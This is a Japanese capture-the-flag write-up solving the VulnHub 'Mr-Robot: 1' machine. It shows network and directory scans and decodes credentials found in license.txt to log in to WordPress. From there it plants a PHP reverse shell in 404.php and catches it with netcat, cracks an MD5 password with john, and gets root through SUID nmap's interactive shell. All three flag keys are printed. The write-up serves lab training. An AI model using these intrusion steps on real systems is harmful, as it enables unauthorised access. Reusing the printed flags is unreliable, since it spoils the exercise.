概要
VulnHub「Mr-Robot: 1」のWriteupです。
User Flag
ターゲットマシンのIPアドレスを特定します。
$nmap -PE -PP -PM -sP -n 192.168.178.0/24
Warning: You are not root -- using TCP pingscan rather than ICMP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-24 06:56 UTC
Nmap scan report for 192.168.178.20
Host is up (0.00015s latency).
Nmap scan report for 192.168.178.30
Host is up (0.00056s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 1.43 seconds
192.168.178.20
は、攻撃用Parrot OSマシンのIPアドレスです。
192.168.178.30
が、ターゲットマシンのIPアドレスだと分かりました。
ポートスキャンを実行します。
$nmap -Pn -sCV -T4 -p- 192.168.178.30 -oN nmap_result
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache
ポートの稼働状況が分かりました。
ポート | サービス | バージョン |
---|---|---|
80 | http | Apache |
443 | http | Apache |
80
番ポートにアクセスすると、ターミナル風の画面が表示されました。
ディレクトリスキャンを実行すると、/robots.txt
や/wp-login
などのパスを発見しました。
WordPressがインストールされている可能性が高いです。
$dirsearch -u http://192.168.178.30
[07:08:02] 200 - 614B - /admin/
[07:08:04] 200 - 677B - /admin/index
[07:08:04] 200 - 677B - /admin/index.html
[07:09:28] 200 - 504KB - /intro
[07:09:33] 200 - 158B - /license
[07:09:33] 200 - 158B - /license.txt
[07:10:12] 200 - 64B - /readme
[07:10:12] 200 - 64B - /readme.html
[07:10:16] 200 - 41B - /robots.txt
[07:10:55] 200 - 1KB - /wp-login
[07:10:55] 200 - 1KB - /wp-login/
[07:10:55] 200 - 1KB - /wp-login.php
/robots.txt
にアクセスすると、2つのパスを新たに発見しました。
$curl http://192.168.178.30/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
key-1-of-3.txt
では、キーの一部を入手できました。
$curl http://192.168.178.30/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
/fsocity.dic
をダウンロードし、中身を見るとパスワード辞書ファイルの様です。
$wget http://192.168.178.30/fsocity.dic
--2025-08-24 07:18:42-- http://192.168.178.30/fsocity.dic
Connecting to 192.168.178.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=======================================>] 6.91M --.-KB/s in 0.1s
2025-08-24 07:18:42 (61.4 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
$head fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window
/wp-admin
にアクセスすると、WordPressのログイン画面が表示されたのでブルートフォースで認証を突破できるかもしれません。
探索を続け、/license.txt
にアクセスすると、Base64でデコードされた文字列を発見しました。
$curl http://192.168.178.30/license.txt
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=
デコードすると、認証情報を入手できました。
$echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652
どちらも入手した辞書ファイルに登録された文字列なので、正しい認証情報の可能性が高いです。
$cat fsocity.dic | grep elliot
elliot
$cat fsocity.dic | grep ER28-0652
ER28-0652
Username: elliot
、Password: ER28-0652
でWordPressの管理画面にログイン出来ました。
Appearance
->Editor
->404.php
にアクセスし、404のページをPHPのリバースシェルコードに書き換えます。
Netcatでリッスンし、/404.php
にアクセスするとシェルを取得できました。
$nc -lnvp 1234
Listening on 0.0.0.0 1234
Connection received on 192.168.178.30 33872
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
16:38:15 up 45 min, 0 users, load average: 0.00, 0.02, 0.21
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
TTYの設定をします。
$ python -c "import pty;pty.spawn('/bin/bash')"
/home/robot
配下を確認すると、2つのファイルを発見しました。
password.raw-md5
は読み取り権限があります。
$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
password.raw-md5
には、robot
アカウントのパスワードハッシュ値らしき文字列が記載されています。
$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
ハッシュ値の解析に成功し、パスフレーズを特定できました。
$john --wordlist=/usr/share/wordlists/rockyou.txt robot_hash --format=Raw-MD5
abcdefghijklmnopqrstuvwxyz (robot)
robot
アカウントに昇格出来ました。
$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ whoami
whoami
robot
key-2-of-3.txt
から2つ目のキーを入手できました。
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Root Flag
SUIDが設定されたプログラムを検索すると、nmap
がヒットしました。
$ find / -perm -u=s -type f 2>/dev/null
/usr/local/bin/nmap
GTFOBinsで権限昇格のテクニックが見つかりました。
nmap経由でシェルを起動すると、rootに昇格出来ました。
$ /usr/local/bin/nmap --interactive
nmap> !sh
!sh
# whoami
whoami
root
/root/key-3-of-3.txt
から最後のキーを入手できました。
# cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4